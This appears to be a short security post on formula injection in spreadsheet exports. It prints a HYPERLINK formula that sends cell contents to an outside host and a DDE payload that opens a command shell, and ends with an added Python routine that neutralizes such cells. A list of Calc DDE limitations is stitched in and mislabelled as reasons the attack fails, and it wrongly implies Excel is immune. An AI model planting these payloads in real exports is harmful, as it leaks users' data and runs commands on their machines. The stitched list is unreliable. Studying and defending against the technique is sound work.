Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality
This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information")
=cmd|' /C cmd'!A0
Possible reasons the attack might not work (known issues with the Calc DDE function):
- Excel does not have the Calc DDE function.
- When using an array to return data, the size of the array is fixed on first calculation. If, for example, the number of lines in a Writer table or section changes, the array size in Calc does not change.
- On the majority of platforms, accented characters are handled incorrectly.
- There are alternative ways to link to external data.
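The defensive counterpart to the payloads above, as an added example that is not part of the original post: a Python export routine that neutralizes cells a spreadsheet would otherwise evaluate. The function names, the sample rows and the trigger-character list (the one OWASP recommends for CSV exports) are assumptions made for illustration.

```python
import csv
import io

# Leading characters a spreadsheet may treat as the start of a formula or
# DDE request (assumption: the list OWASP recommends for CSV exports).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a cell value that a spreadsheet will display as literal text."""
    # Numeric values produced by the application itself are passed through;
    # only text can carry an attacker-supplied formula.
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return value
    text = "" if value is None else str(value)
    # Conservative choice: look past leading spaces, since an importer may trim them.
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text  # a leading apostrophe marks the cell as text
    return text


def export_csv(rows):
    """Serialize rows to CSV with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample data: the "comment" column holds user-supplied text,
# here the two payloads quoted in this post.
SAMPLE_ROWS = [
    ["name", "balance", "comment"],
    ["alice", 1200, "paid in full"],
    ["bob", -35.5, '=HYPERLINK("http://contextis.co.uk?leak="&A1&A2, '
                   '"Error: please click for further information")'],
    ["carol", 0, "=cmd|' /C cmd'!A0"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS), end="")
```

The apostrophe prefix stays in the exported data, so programs that consume the CSV for purposes other than display need to strip it again.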
Reference
https://wiki.openoffice.org/wiki/Documentation/How_Tos/Calc:_DDE_function
http://contextis.co.uk/blog/comma-separated-vulnerabilities/